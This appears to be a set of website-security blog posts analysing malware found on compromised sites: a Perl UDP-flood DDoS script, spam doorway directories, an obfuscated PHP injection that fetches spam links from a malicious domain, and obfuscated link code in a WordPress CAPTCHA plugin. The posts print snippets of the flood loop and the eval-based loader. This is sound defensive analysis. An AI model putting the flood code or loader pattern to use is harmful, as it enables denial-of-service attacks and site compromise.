Author: Bruno Zanelato

After a website is compromised, it can be misused in multiple ways. We often see it being used on Spam SEO campaigns or to distribute drive-by-downloads. However, last week, we found an interesting DDoS (Denial of Service) tool on one of our clients websites that I would like to share.

The code was added to /var/tmp and being called by an external PHP script to allow a remote attacker to start DDoS against specific targets. This is a snippet of the malicious code:

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpakets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &"); 
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

The malware takes an $ip, $port and $time as an argument to launch the attack:

$ARGC=@ARGV;
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[0];
$time=$ARGV[0];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

Once the information is supplied, the script sends as many UDP packets as possible trying to flood the victim’s network. The side effect is that the compromised server could also get overloaded by its resources (cpu/memory) consumption and also overflow bandwidth limits.

If your site is currently experiencing high usage of server resources or unexpected behavior, it could be an indication of a compromise. It’s equally important to be on the lookout for such issues.

You can always count on CloudProxy, our website firewall, to help you protecting your site against this and many other attacks.

Chinese replica spam campaigns aim for large number of doorways per infected site. And quite often their doorways are static, which means hundreds of thousands created .html files.

Last year the most popular approach was creating several directories with meaningless names with 10-30 thousand doorways in each. This year we began noticing a new modification that creates only one doorway file (content.php) per directory, but the number of such spammy directories may be staggering. For example, on a site that had been compromised for at least three months (it easy to tell as the directory names are time stamps such as 20160112123901 or 20160123165028), the hackers created over 200,000 such directories.

As you might imagine, not all shared hosts may properly manage such large numbers of files. In some cases, this leads to exceeding account inode quota. Even a simple ls command may become a problem. Here's the warning that you may see on a DreamHost server when you execute the ls command in a directrory with too many spammy subdirectories.

$ ls -l | wc -lYikes! One of your processes (ls, pid 21519) was just killed for excessive resource usage.Please contact DreamHost Support for details.208897

Don't wait until hackers cause serious problems. Add security monitoring and protection to your site.

We see quite a few sites with the following injected PHP code:

//###=CACHE START=###
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXF...skipped...Tyvqwg9"));'));
//###=CACHE END=###

This malware contacts dfoiqweomxa[.]ru and fetches spam links from there. The spam mainly promotes Russian phishing and money laundering sites. Infected sites can be found all around the world. We found this spam even on sites of American and international universities.

Do you remember SweetCAPTCHA that tried to monetize its WordPress plugin injecting unwanted ads into web pages?

Today we've found another CAPTCHA plugin with a suspicious code. We cleaned a site and our scanner reported a suspicious obfuscated code inside the Captcha on Login plugin (45,000+ all time installs) files.

captcha-on-login/index.php
captcha-on-login/templates/report.php
captcha-on-login/templates/options.php

The obfuscation had strings like this:

...
${ "GL\x4f\x42\x41LS" }[ "\x64\x78cq\x70c\x6ax\x77\x6f\x63\x72" ]
...

When we see such things, we always try to decode them to figure out whether it's legitimate or not.

...
public function options_page(){
$meu_link="http://vendacomtrafegogratuito [.]com .br";$meu_link2="hxxp://hotplus [.]net .br/plugin-hotlinks-plus/?clear";include("templates/options.php");
$meu_link="hxxp://vendacomtrafegogratuito [.]com .br";$meu_link2="http://hotplus [.]net .br/ plugin-hotlinks-plus/?clear";
}
...

Looks like that the owner of this plugin, called "Anderson Makiyama" is a Brazilian developer who is the owner of these affiliate marketing websites:
hxxp://hotplus .net .br/ plugin-hotlinks-plus/
hxxp://funildevendasparainiciante .com .br/ onde-divulgar-links-de-afiliados/

This plugin seems to be only showing these links inside the WordPress admin interface on the plugin options and report pages as "Other products of the author" (Outros Produtos do Autor). It's maybe a bit annoying but doesn't seem to be a big deal. It's natural for plugin developers to pitch their other products (even such questionable ones) on the internal plugin pages (not visible to site users).

The only problem is that link injecting code is obfuscated. Not only does it result in warnings produced by security scanners, but this practice is considered unacceptable by the official WordPress Plugin Directory guidelines:

4. No obfuscated code. We believe that obfuscated code violates the spirit, if not the letter, of the GPL license under which we operate....
...Intentionally obfuscated code is not the preferred form, and not allowed in the repository under any circumstances.

It's sad to see how plugins that are supposed to help stop hackers, actually do things that resemble what hackers do. Sometimes you can find such plugins even in the official WordPress plugin directory.

If you are looking for alternative solutions against brute force attacks, you can check our Website Firewall.